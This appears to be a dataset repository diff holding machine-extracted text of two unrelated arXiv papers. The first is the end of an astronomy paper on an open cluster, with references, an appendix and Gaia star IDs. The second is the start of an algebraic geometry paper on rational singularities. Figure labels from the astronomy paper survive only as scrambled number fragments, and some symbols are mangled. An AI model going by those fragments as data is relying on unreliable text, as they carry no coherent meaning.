625
+ Bressan A., Marigo P., Girardi L., Salasnich B., Dal Cero C.,
626
+ Rubele S., Nanni A., 2012, MNRAS, 427, 127
627
+ Campello R. J. G. B., Moulavi D., Sander J., 2013, In: Pei, J.,
628
+ Tseng, V.S., Cao, L., Motoda, H., Xu, G. (eds) Advances
629
+ in Knowledge Discovery and Data Mining. Lecture Notes in
630
+ Computer Science(), vol 7819. Springer, Berlin, Heidelberg.
631
+ Cantat-Gaudin T., et al., 2018, A&A, 618, A93
632
+ Cantat-Gaudin T., et al., 2020, A&A, 640, A1
633
+ Castro-Ginard A., et al., 2022, A&A, 661, A118
634
+ Chen B. Q., et al., 2019, MNRAS, 483, 4277
635
+ Chen B. Q., et al., 2020, MNRAS, 493, 351
636
+ Dias W. S., Monteiro H., Caetano T. C., L´epine J. R. D., Assafin
637
+ M., Oliveira A. F., 2014, A&A, 564, A79
638
+ Drimmel R., Cabrera-Lavers A., L´opez-Corredoira M., 2003,
639
+ A&A, 409, 205
640
+ Efron B., 1982, The Jackknife, the Bootstrap and other resam-
641
+ pling plans
642
+ Gaia Collaboration et al., 2016, A&A, 595, A1
643
+ Gaia
644
+ Collaboration
645
+ et
646
+ al.,
647
+ 2022,
648
+ arXiv
649
+ e-prints,
650
+ p.
651
+ arXiv:2206.06207
652
+ Hao C. J., Xu Y., Wu Z. Y., Lin Z. H., Liu D. J., Li Y. J., 2022,
653
+ A&A, 660, A4
654
+ Høg E., 2000, in Murdin P., ed., , Encyclopedia of Astronomy and
655
+ Astrophysics. p. 2862, doi:10.1888/0333750888/2862
656
+ Hunt E. L., Reffert S., 2021, A&A, 646, A104
657
+ Jaehnig K., Bird J., Holley-Bockelmann K., 2021, ApJ, 923, 129
658
+ Jerabkova T., Boffin H. M. J., Beccari G., de Marchi G., de Brui-
659
+ jne J. H. J., Prusti T., 2021, A&A, 647, A137
660
+ Kharchenko N. V., 2001, Kinematika i Fizika Nebesnykh Tel, 17,
661
+ 409
662
+ Kharchenko N. V., Piskunov A. E., R¨oser S., Schilbach E., Scholz
663
+ R. D., 2005, A&A, 440, 403
664
+ Kharchenko N. V., Berczik P., Petrov M. I., Piskunov A. E., R¨oser
665
+ S., Schilbach E., Scholz R. D., 2009, A&A, 495, 807
666
+ MNRAS 000, 1–7 (2022)
667
+
668
+ le6
669
+ 2.5
670
+ 2.0
671
+ 1.5
672
+ 1.0
673
+ 0.5
674
+ 0.0
675
+ E
676
+ 0.5
677
+ 1.0
678
+ 2
679
+ 3
680
+ 4
681
+ 5
682
+ 8910
683
+ 20
684
+ R (pc)
685
+ 1.2
686
+ 1.4
687
+ 1.6
688
+ 1.8
689
+ 2.0
690
+ 2.2
691
+ M (M。)A disrupting open cluster
692
+ 7
693
+ Kharchenko N. V., Piskunov A. E., Schilbach E., R¨oser S., Scholz
694
+ R. D., 2012, A&A, 543, A156
695
+ Kharchenko N. V., Piskunov A. E., Schilbach E., R¨oser S., Scholz
696
+ R. D., 2013, A&A, 558, A53
697
+ Knuth K. H., 2018, optBINS: Optimal Binning for histograms
698
+ (ascl:1803.013)
699
+ Kronberger M., et al., 2006, A&A, 447, 921
700
+ Krone-Martins A., Moitinho A., 2014, A&A, 561, A57
701
+ Kroupa P., 2002, Science, 295, 82
702
+ K¨upper A. H. W., Kroupa P., Baumgardt H., Heggie D. C., 2010,
703
+ MNRAS, 407, 2241
704
+ Liu L., Pang X., 2019, ApJS, 245, 32
705
+ Marshall D. J., Robin A. C., Reyl´e C., Schultheis M., Picaud S.,
706
+ 2006, A&A, 453, 635
707
+ Meingast S., Alves J., Rottensteiner A., 2021, A&A, 645, A84
708
+ Perren G. I., V´azquez R. A., Piatti A. E., 2015, A&A, 576, A6
709
+ Piatti A. E., 2019, ApJ, 882, 98
710
+ Planck Collaboration et al., 2014, A&A, 571, A11
711
+ Portegies Zwart S., McMillan S., 2018, Astrophysical Recipes;
712
+ The art of AMUSE, doi:10.1088/978-0-7503-1320-9.
713
+ R¨oser S., Schilbach E., 2019a, A&A, 627, A4
714
+ R¨oser S., Schilbach E., 2019b, A&A, 627, A4
715
+ Sampedro L., Dias W. S., Alfaro E. J., Monteiro H., Molino A.,
716
+ 2017, MNRAS, 470, 3937
717
+ Schlafly E. F., et al., 2014, ApJ, 789, 15
718
+ Schlegel D. J., Finkbeiner D. P., Davis M., 1998, ApJ, 500, 525
719
+ Soubiran C., et al., 2018, A&A, 619, A155
720
+ Tremmel M., et al., 2013, ApJ, 766, 19
721
+ Wang L., Jerabkova T., 2021, A&A, 655, A71
722
+ Wang L., Iwasawa M., Nitadori K., Makino J., 2020, MNRAS,
723
+ 497, 536
724
+ APPENDIX A: MEMBERSHIP CRITERIA
725
+ For completeness purposes, we compared our membership
726
+ probabilities with those obtained by Cantat-Gaudin et al.
727
+ (2018). In order to cross-match both samples, we employed
728
+ the names used by Gaia to identify stellar sources and the
729
+ Astropy package. Left and right panels of Fig. A1 corre-
730
+ spond to the star selection made in this work and those
731
+ from Cantat-Gaudin et al. (2018), respectively. The symbols
732
+ are coloured according to the membership probability (P)
733
+ assigned by each study, while those encircled with a black
734
+ open circle are the stars in common in both works. As can
735
+ be seen, the number of stars with relatively high member-
736
+ ship probabilities is larger in the present sample. The proper
737
+ motions and mean parallaxes span wider ranges in Cantat-
738
+ Gaudin et al. (2018)’s sample. We are confident in the more
739
+ stringent membership selection criteria applied here and the
740
+ use of stars with P > 70 per cent in the performed analy-
741
+ ses. Note that the differential reddening is present in both
742
+ CMDs. Finally, Table A1 lists the Gaia names of the stars
743
+ identified in this work that are absent in the Cantat-Gaudin
744
+ et al. (2018)’s sample.
745
+ This paper has been typeset from a TEX/LATEX file prepared by
746
+ the author.
747
+ Figure A1.
748
+ Relationships of Gaia parameters used in this work
749
+ (left panels) and in Cantat-Gaudin et al. (2018) (right panels),
750
+ respectively.
751
+ MNRAS 000, 1–7 (2022)
752
+
753
+ 25
754
+ 25
755
+ △(Dec.)
756
+ △(Dec.)
757
+ 0
758
+ 0
759
+ -25
760
+ 25
761
+ 25
762
+ 0
763
+ -25
764
+ 25
765
+ 0
766
+ -25
767
+ A(R.A.)xcos(Dec.)()
768
+ A(R.A.)xcos(Dec.)()
769
+ -3.5
770
+ -3.5
771
+ (mas/yr)
772
+ las/
773
+ -4.0
774
+ 4.0
775
+ -4.5
776
+
777
+ -4.5
778
+ 2.0
779
+ -1.5
780
+ -1.0
781
+ -0.5
782
+ 2.0
783
+ -1.5
784
+ -1.0
785
+ 0.5
786
+ μα (mas/yr)
787
+ μ (mas/yr)C
788
+ 1.6
789
+ 1.6
790
+ (mas
791
+ (mas
792
+ O
793
+ B 1.4
794
+ B 1.4
795
+ O
796
+ 1.2
797
+ 1.2
798
+ 12
799
+ 14
800
+ 16
801
+ 12
802
+ 14
803
+ 16
804
+ G (mag)
805
+ G (mag)
806
+ 10.0
807
+ 10.0
808
+ 6
809
+ 12.5
810
+ 6
811
+ (ma
812
+ (ma
813
+ 12.5
814
+ G
815
+ 15.0
816
+ G15.0
817
+ 17.5
818
+ 17.5
819
+ 1
820
+ 2
821
+ 3
822
+ 1
823
+ 2
824
+ 3
825
+ BP-RP(mag)
826
+ BP-RP(mag)
827
+ 0
828
+ 20
829
+ 40
830
+ 60
831
+ 80
832
+ 100
833
+ P (%)8
834
+ Andr´es E. Piatti
835
+ Table A1. Gaia IDs of stars selected in this work that are absent in the Cantat-Gaudin et al. (2018)’s sample.
836
+ 4151598199606998528
837
+ 4151598440125176192
838
+ 4151599677077307136
839
+ 4151581638213227264
840
+ 4151573872910627584
841
+ 4151703855796778752
842
+ 4151706535856460544
843
+ 4163590534247506560
844
+ 4151550675772022528
845
+ 4150045173804666368
846
+ 4151707704087604352
847
+ 4151559373100984704
848
+ 4151569917226328448
849
+ 4151572051844491904
850
+ 4150048884656569472
851
+ 4151584249552588416
852
+ 4151693715358252288
853
+ 4151599230392430848
854
+ 4151574285227815040
855
+ 4151561056728596480
856
+ 4151598818083966464
857
+ 4163589851366486144
858
+ 4151558342294713216
859
+ 4151584932425464832
860
+ 4151607408016493568
861
+ 4151546075881760640
862
+ 4163613628306249088
863
+ 4151548545465664000
864
+ 4151594591833995776
865
+ 4151611874782646656
866
+ 4151596614737584256
867
+ MNRAS 000, 1–7 (2022)
868
+
KtE2T4oBgHgl3EQfpwgn/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
L9E3T4oBgHgl3EQfBAkx/content/tmp_files/2301.04262v1.pdf.txt ADDED
@@ -0,0 +1,1177 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ arXiv:2301.04262v1 [math.AG] 11 Jan 2023
2
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
3
+ DONGHYEON KIM
4
+ Abstract. In this paper, we generalize the notion of rational singularities for any
5
+ reflexive sheaf of rank 1 and prove generalizations of standard facts about rational
6
+ singularities. Moreover, we introduce the notion of (Bq+1) as a dual notion of well-
7
+ known Serre’s notion of (Sq+1) and prove a theorem about q-birational morphism.
8
+ 1. Introduction
9
+ In this paper, q ≥ 2 is an integer, k is any algebraically closed field and the charac-
10
+ teristic of k can be positive. Any variety is quasi-projective, separated, finite type and
11
+ integral scheme over k. Any divisor is assumed to be Cartier unless otherwise stated.
12
+ For convenience, in the section, we assume that all reflexive sheaves are of rank 1.
13
+ Throughout the paper, we will assume that for any normal variety X, there is a proper
14
+ birational morphism f : X′ → X in which X′ is smooth and f is an isomorphism outside
15
+ of the singular locus of X. We say such proper birational morphism is a resolution of
16
+ X. If k is of characteristic 0, our assumption is the well-known Hironaka’s resolution of
17
+ singularities and if k is of positive characteristic, only the threefold case is known to be
18
+ positive (see [Hir64] and [Cut09]).
19
+ If X is a variety, X has rational singularities if and only if for any resolution f : X′ →
20
+ X, f∗OX′ = OX, Rif∗OX′ = 0 and Rif∗ωX′ = 0 for i ≥ 1 (see [Kol13], Definition 2.76).
21
+ The notion of rational singularities plays an important role in algebraic geometry. For
22
+ instance, if X is a variety with rational singularities and f : X′ → X is a resolution of
23
+ X, we have
24
+ Hi(X′, f ∗E) ∼= Hi(X, E)
25
+ for any i ≥ 0 and any vector bundle E on X (see [KM98], Theorem 5.10). Hence, it is
26
+ worth extending the notion to various settings.
27
+ Previously, there are some works extending the notion of rational singularities. For
28
+ example, for any normal variety X, Schwede and Takagi in [ST08] defined a notion of
29
+ rational singularities for a pair (X, aλ) with an ideal sheaf a on X and λ > 0. In [Kov11]
30
+ and [Kol13], Koll´ar and Kov´acs defined a notion of rational singularities for (X, D) with
31
+ a reduced Weil divisor D on X. Both definitions are for pairs. In this paper, we will
32
+ define an analogous notion of rational singularities for a reflexive sheaf F on a normal
33
+ Date: January 12, 2023.
34
+ 2010 Mathematics Subject Classification. 14B05, 14E05, 14G17.
35
+ Key words and phrases. rational singularities, q-birational morphism.
36
+ 1
37
+
38
+ 2
39
+ DONGHYEON KIM
40
+ variety X. Our definition is different from the definitions in [ST08], [Kov11] and [Kol13]
41
+ because our notion is for a reflexive sheaf, not for a pair.
42
+ Proposition 1.1 (See Proposition 4.1). Let X be any normal variety and F any reflexive
43
+ sheaf on X. Suppose that f : X′ → X is a resolution. Then we have a natural map
44
+ θF,f : Rf∗(f ∗F)D → RHomOX(F, ω•
45
+ X)[− dim X].
46
+ Definition 1.2 (See Definition 4.3). Let X be any normal variety and F any reflexive
47
+ sheaf on X. We say that F has weak rational singularities if θF,f in Proposition 1.1 is a
48
+ quasi-isomorphism for the F and for any resolution f : X′ → X.
49
+ For the definition of the dual F D of F, see Definition 3.1. Our definition of weak
50
+ rational singularities does not require F to be CM. One can define a much stronger
51
+ notion of rational singularities as the following.
52
+ Definition 1.3 (See Corollary 4.7). Let X be any normal variety and F any reflexive
53
+ sheaf on X which has weak rational singularities.
54
+ (a) If F is CM, we say F has rational singularities.
55
+ (b) We say that a Weil divisor D on X has rational singularities if OX(D) has rational
56
+ singularities.
57
+ (c) We say that F is (KVq) if the support of Rif∗(f ∗F)D has codimension ≥ i+q+1
58
+ for any i ≥ 1 and any resolution f : X′ → X.
59
+ One of the fundamental properties of klt and strongly F-regular varieties are that all
60
+ klt varieties over a characteristic 0 field and strongly F-regular varieties over a positive
61
+ characteristic field have rational singularities (see [Elk81], [KMM87] and [HW19]). One
62
+ may extend the theorems as follows:
63
+ Proposition 1.4 (See Proposition 4.15). Let X be any normal variety over a character-
64
+ istic 0 field, ∆ any effective Q-Weil divisor such that (X, ∆) is klt and D any Q-Cartier
65
+ Weil divisor on X. Then D has rational singularities.
66
+ Proposition 1.5 (See Proposition 4.17). Let X be any strongly F-regular variety over
67
+ a positive characteristic field and D any Weil divisor such that there is an integer r such
68
+ that rD is linearly equivalent to a Cartier divisor and r is relatively prime to p. Then
69
+ D has rational singularities.
70
+ Our notion of rational singularities is well-behaved under finite ´etale morphism.
71
+ Proposition 1.6 (See Proposition 4.19). Let X, Y be normal varieties over characteristic
72
+ 0 field, p : Y → X any finite ´etale morphism and F any reflexive sheaf on X. If p∗F
73
+ has (resp. weak) rational singularities, then F has (resp. weak) rational singularities.
74
+ For a normal variety X, one may want to measure how far a non-rational singularity
75
+ is from being rational. For this purpose, the notion of non-rational locus is defined in
76
+ [AH12] and [Kov11]. The following definition is a candidate for the analog of that notion.
77
+
78
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
79
+ 3
80
+ Definition 1.7. Let X be any normal variety and F any reflexive sheaf on X. We say
81
+ that F is (RSq) if for any point x ∈ X with codimX x ≤ q and any resolution f : X′ → X,
82
+ θF,f is a quasi-isomorphism after localizing θF,f at x.
83
+ By adopting the idea of proof of Lemma 3.3 in [Kov99], we can define the notion of
84
+ (Bq+1) and prove a duality theorem.
85
+ Definition 1.8 (See Definition 5.1). Let X be any normal variety and F any reflexive
86
+ sheaf on X. We say F is (Bq+1) if Hi
87
+ x(X, F) = 0 for any dim X − q < i < dim X and
88
+ any closed point x ∈ X.
89
+ Theorem 1.9 (See Theorem 5.2). Let X be any normal projective variety and F any
90
+ reflexive sheaf on X, which is (RSq) and (KVq). Then the following are equivalent:
91
+ (a) F is (Sq+1).
92
+ (b) For any resolution f : X′ → X such that for any 1 ≤ i < q, Rif∗(f ∗F)DD = 0.
93
+ (c) F D is (Bq+1).
94
+ Corollary 1.10 (See Corollary 5.4). Assume that q ≥
95
+ � dim X+1
96
+ 2
97
+
98
+ . Let X be any normal
99
+ Q-factorial variety over a characteristic 0 field with (Rq) and any Weil divisor on X is
100
+ (Sq+1). Then any Weil divisor on X is CM. In particular, X is CM itself.
101
+ The above theorem can be used to generalize Theorem 3.4 in [Kim22] such as the
102
+ following.
103
+ Definition 1.11 (See Definition 6.1). Let X, X′ be any normal varieties and f : X′ → X
104
+ any proper birational morphism.
105
+ (a) The center of f is the reduced closed subscheme C of X which is the image of
106
+ exceptional locus along f.
107
+ (b) We say f is a q-birational morphism if the exceptional locus has codimension 1
108
+ and the center of f has codimension ≥ q + 1.
109
+ Theorem 1.12 (See Theorem 6.4). Let X, X′ be any normal projective varieties over
110
+ a field of characteristic 0 and f : X′ → X any q-birational morphism in which X′ is
111
+ smooth. Suppose that D is any anti f-nef divisor on X′ such that f∗D is Q-Cartier and
112
+ (Sq+1). Then Rif∗OX′(D) = 0 for 1 ≤ i < q.
113
+ Notation 1.13. Given any normal varieties X, X′ with any proper morphism f : X′ → X
114
+ and any (not necessarily closed) point x ∈ X, we write X′
115
+ x := X′ ×X Spec OX,x, dim x
116
+ for the dimension of the closure of x and codimX x := dim X − dim x.
117
+ For any coherent sheaves F, F ′ on X, X′ respectively and the inclusion  : X′
118
+ x → X′,
119
+ write F ′
120
+ x := j∗F ′. In addition to that, set OX′,x := (OX′)x and ωX′,x := (ωX′)x. Note
121
+ that if f : X′ → X is a resolution of X, then X′
122
+ x is a regular scheme.
123
+ For simplicity, if i ≥ 0, a point x ∈ X and a coherent sheaf F on X is given, set
124
+ Hi
125
+ x(X, F) := Hi
126
+ x(Xx, Fx).
127
+
128
+ 4
129
+ DONGHYEON KIM
130
+ Also, under the same conditions of the above, if a resolution f : X′ → X and a coherent
131
+ sheaf F ′ on X′ is given, let
132
+ Hi
133
+ f−1(x)(X′, F ′) := Hi
134
+ f−1(x)(X′
135
+ x, F ′
136
+ x).
137
+ For a noetherian scheme X with a dualizing complex, ω•
138
+ X denotes the normalized
139
+ dualizing complex.
140
+ The rest of the paper is organized as follows. We begin Section 2 by defining some
141
+ basic notions and by stating and proving basic theorems. Section 3 is devoted to proving
142
+ basic results about reflexive sheaves. In Section 4, we define (weak) rational singularities
143
+ and prove some basic theorems. In section 5, we define the notion of (Bq+1) and prove the
144
+ main theorem about that notion. Section 6 is devoted to defining q-birational morphism
145
+ and proving the main theorems about q-birational morphism.
146
+ Acknowledgments. The author thanks his advisor Sung Rak Choi for his comments,
147
+ questions, and discussions. He is grateful for their hospitality. The author is grateful to
148
+ S´andor Kov´acs for his helpful comments on an earlier version of this paper.
149
+ 2. Preliminaries
150
+ The section is devoted to collecting basic definitions and facts used in the paper.
151
+ Definition 2.1. Let X be any normal variety and F any torsion-free sheaf on X.
152
+ (a) We say F is (Rq) if there is an open subscheme U ⊆ X of X such that codimX(X\
153
+ U) ≥ q + 1, U is smooth and F|U is a vector bundle on U
154
+ (b) We say X is (Rq) if OX is (Rq).
155
+ (c) We say F is (Sq+1) if Hi
156
+ x(X, F) = 0 for i < min{q + 1, codimX x} and any point
157
+ x ∈ X.
158
+ (d) We say F is Cohen-Macaulay (CM) if F is (Sdim X).
159
+ (e) We say X is Cohen-Macaulay (CM) if OX is CM.
160
+ (f) We say F is reflexive if F is (S2).
161
+ Remark 2.2. If X is any normal variety with (Rq), then any reflexive sheaf on X
162
+ of rank 1 is also (Rq).
163
+ An analogue for (Sq+1) does not hold.
164
+ Indeed, let X :=
165
+ Spec k[x, y, z, w]/(xy − zw). Then X is CM but not any reflexive sheaf on X of rank 1
166
+ is not CM. See 3.15 in [Kol13].
167
+ We will use derived category machinery in the paper, especially in Section 4 and
168
+ Section 5. Hence, it is worth stating the local duality and the Grothendieck duality.
169
+ Theorem 2.3 (See Lemma 0AAK in [Stacks]). Let X be any noetherian schemes that
170
+ has a dualizing complex, x ∈ X any closed point and E the injective hull of the residue
171
+ field of OX,x. Then
172
+ Ext−i
173
+ OX,x(K, ω•
174
+ X)∧
175
+ x ∼= HomOX,x(Hi
176
+ x(X, K), E)
177
+
178
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
179
+ 5
180
+ for any i and K ∈ D(X), where (−)∧
181
+ x denotes the completion along the maximal ideal
182
+ mX,x of OX,x and D(X) denotes the derived category of bounded complexes of coherent
183
+ sheaves on X.
184
+ Theorem 2.4 (See 0AU3, (4) in [Stacks]). Let X, X′ be any noetherian schemes that
185
+ have dualizing complexes and f : X′ → X any proper morphism of varieties. For any
186
+ K ∈ D(X′),
187
+ RHomOX(Rf∗K, ω•
188
+ X) ∼= Rf∗RHomOX′(K, ω•
189
+ X′) in D(X).
190
+ The following theorem is well-known as the relative Kawamata-Viehweg vanishing
191
+ theorem.
192
+ Theorem 2.5 (See [KMM87], Theorem 1-2-3). Let X′ any smooth projective variety over
193
+ a field of characteristic 0 and X any projective variety. Let f : X′ → X be any proper
194
+ birational morphism. For any f-nef Cartier divisor D on X′, Rif∗OX′(KX′ + D) = 0
195
+ for i ≥ 1.
196
+ Let us prove the following duality result. For a similar lemma, see Proposition 11.6 in
197
+ [Kol97].
198
+ Lemma 2.6. Let f : X′ → X be any proper birational morphism between normal vari-
199
+ eties and E any vector bundle on X′. Fix any point x ∈ X. Suppose X′ is Gorenstein.
200
+ Then for i ≥ 0, (Rif∗E)x = 0 if and only if HcodimX x−i
201
+ f−1(x)
202
+ (X′, ωX′ ⊗ E∨) = 0.
203
+ Proof. Let k be the residue field of OX,x and E the injective hull of k as an OX,x-module.
204
+ We have
205
+ RΓf−1(x)(X′, ωX′ ⊗ E∨) = RΓx(X, Rf∗(ωX′ ⊗ E∨))
206
+ = Homk(RHomOX(Rf∗(ωX′ ⊗ E∨)x, ω•
207
+ X,x), E)
208
+ = Homk(Rf∗RHomOX(ωX′ ⊗ E∨, ωX′)x[codimX x], E)
209
+ = Homk(Rf∗HomOX(ωX′ ⊗ E∨, ωX′)x[codimX x], E)
210
+ = Homk((Rf∗E)x[codimX x], E),
211
+ where we used the Leray spectral sequence in the first equality, the local duality in the
212
+ second equality, the Grothendieck duality in the third equality, the fact that ωX′ is a line
213
+ bundle on X′ in the forth equality. Hence, since E is an injective OX,x-module, we have
214
+ the assertion.
215
+
216
+ Let us prove the following corollary.
217
+ Corollary 2.7 (See Lemma 3.5.10 in [Nak04] and Corollary 11.7 in [Kol97]). Let X be
218
+ any normal projective variety over a field of characteristic 0, f : X′ → X any resolution
219
+ of X and D any divisor on X′, which is anti f-nef. Then f∗OX′(D) = OX(f∗D).
220
+ Proof. Note that by definition, OX(f∗D) := (f∗OX′(D))∨∨. Hence, it suffices to show
221
+ that f∗OX′(D) is reflexive. Let x ∈ X be any point of codimension ≥ 2.
222
+
223
+ 6
224
+ DONGHYEON KIM
225
+ Consider the following spectral sequence
226
+ Est
227
+ 2 = Hs
228
+ x(X, Rtf∗OX′(D)) =⇒ Hs+t
229
+ f−1(x)(X′, OX′(D)).
230
+ Inspecting the spectral sequence, we have E10
231
+ 2
232
+ = E10
233
+ ∞. Hence, by considering the edge
234
+ map E10
235
+ ∞ → E1, it suffices to show that H1
236
+ f−1(x)(X′, OX′(D)) = 0. Note that by the
237
+ relative Kawamata-Viehweg vanishing theorem, Rif∗OX(KX′ − D) = 0 for i ≥ 1. Thus,
238
+ by Lemma 2.6, we have the assertion.
239
+
240
+ Remark 2.8. Note that it is a special case of [Nak04], Lemma 3.5.10. Nakayama proved
241
+ the lemma using the relative Zariski decomposition.
242
+ We may use the following lemma without any mention.
243
+ Lemma 2.9 (See Lemma 2.2 in [BMP+20]). For any normal variety X and any coherent
244
+ sheaf F on X, we have
245
+ HomOX(F, ω•
246
+ X)[− dim X] = HomOX(F, ωX).
247
+ Proof. We may consider the following exact triangle
248
+ ωX[− dim X] → ω•
249
+ X → C →
250
+ for some complex C in D(X). If we apply RHomOX(F, −) to this triangle, we obtain
251
+ the following exact triangle
252
+ RHomOX(F, ωX[− dim X]) → RHomOX(F, ω•
253
+ X) → RHomOX(F, C) → .
254
+ Note that C has cohomological degree ≥ 1 and hence HomOX(F, C) = 0. Thus, the long
255
+ exact cohomology sequence gives us the assertion.
256
+
257
+ 3. Reflexive sheaves
258
+ In this section, we collect important facts about reflexive sheaves. For a variety X,
259
+ the generic point η ∈ X and a coherent sheaf F on X, rank F denotes the dimension of
260
+ Fη over the function field of X.
261
+ Definition 3.1 (See [HL10], Definition 1.1.7). Let X be any variety and F any coherent
262
+ sheaf on X. We define F D := HomOX(F, ωX).
263
+ Remark 3.2. Under the setting of Definition 3.1, for any normal Gorenstein variety X
264
+ and reflexive sheaf F on X, F D = F ∨ ⊗ ωX. Moreover, we can construct a natural map
265
+ F → F DD. Indeed, for any local section a ∈ F, consider a map
266
+ ϕ : F → F DD, a �→ (f �→ f(a)) for f ∈ F D := HomOX(F, ωX).
267
+ Now, let us prove the following two lemmas.
268
+ Lemma 3.3. Let X be any normal variety and F any coherent sheaf on X. Then the
269
+ following are equivalent:
270
+ (a) F is torsion-free.
271
+
272
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
273
+ 7
274
+ (b) The map F → F DD is injective.
275
+ Proof. It is worth noting that for any variety X, ωX is (S2).
276
+ See Lemma 0AWE in
277
+ [Stacks]. Hence, if X is normal, then ωX is reflexive.
278
+ If F is torsion-free, then the kernel K of the map is torsion-free because any subsheaf of
279
+ a torsion-free sheaf is also torsion-free. Moreover, since ωX is reflexive, F DD is torsion-
280
+ free by Lemma 0AY4 in [Stacks].
281
+ Consider the fact that for every point x ∈ X of
282
+ codimension 1, Fx → F DD
283
+ x
284
+ is an isomorphism. Then K = 0 because rank K = 0.
285
+ For the converse, since ωX is torsion-free, F DD is torsion-free. Hence, by our assump-
286
+ tion, F is torsion-free because any subsheaf of a torsion-free sheaf is also torsion-free.
287
+
288
+ Lemma 3.4. Let X be any normal variety and F any torsion-free sheaf on X. Then
289
+ the following are equivalent:
290
+ (a) F is reflexive.
291
+ (b) The natural map F → F DD is an isomorphism.
292
+ Proof. Let us assume that F is reflexive. By Lemma 0AY4 in [Stacks], we know that
293
+ F DD is also reflexive and F → F DD is an isomorphism outside codimension ≥ 2 closed
294
+ subscheme of X. Hence the map is an isomorphism by [Har94], Proposition 1.11.
295
+ For the converse, let E1 → E0 → F D → 0 be any resolution of F in which E0, E1 are
296
+ vector bundles. By taking HomOX(−, ωX), we have the following exact sequence
297
+ 0 → F ∼= F DD → ED
298
+ 0 → ED
299
+ 1
300
+ and ED
301
+ i
302
+ are reflexive for i = 0, 1. Hence, F is reflexive.
303
+
304
+ Remark 3.5. If X is not normal, then such equivalence is false. See Remark 0AY1 in
305
+ [Stacks].
306
+ Let us note an important fact about reflexive sheaves.
307
+ For any normal variety X
308
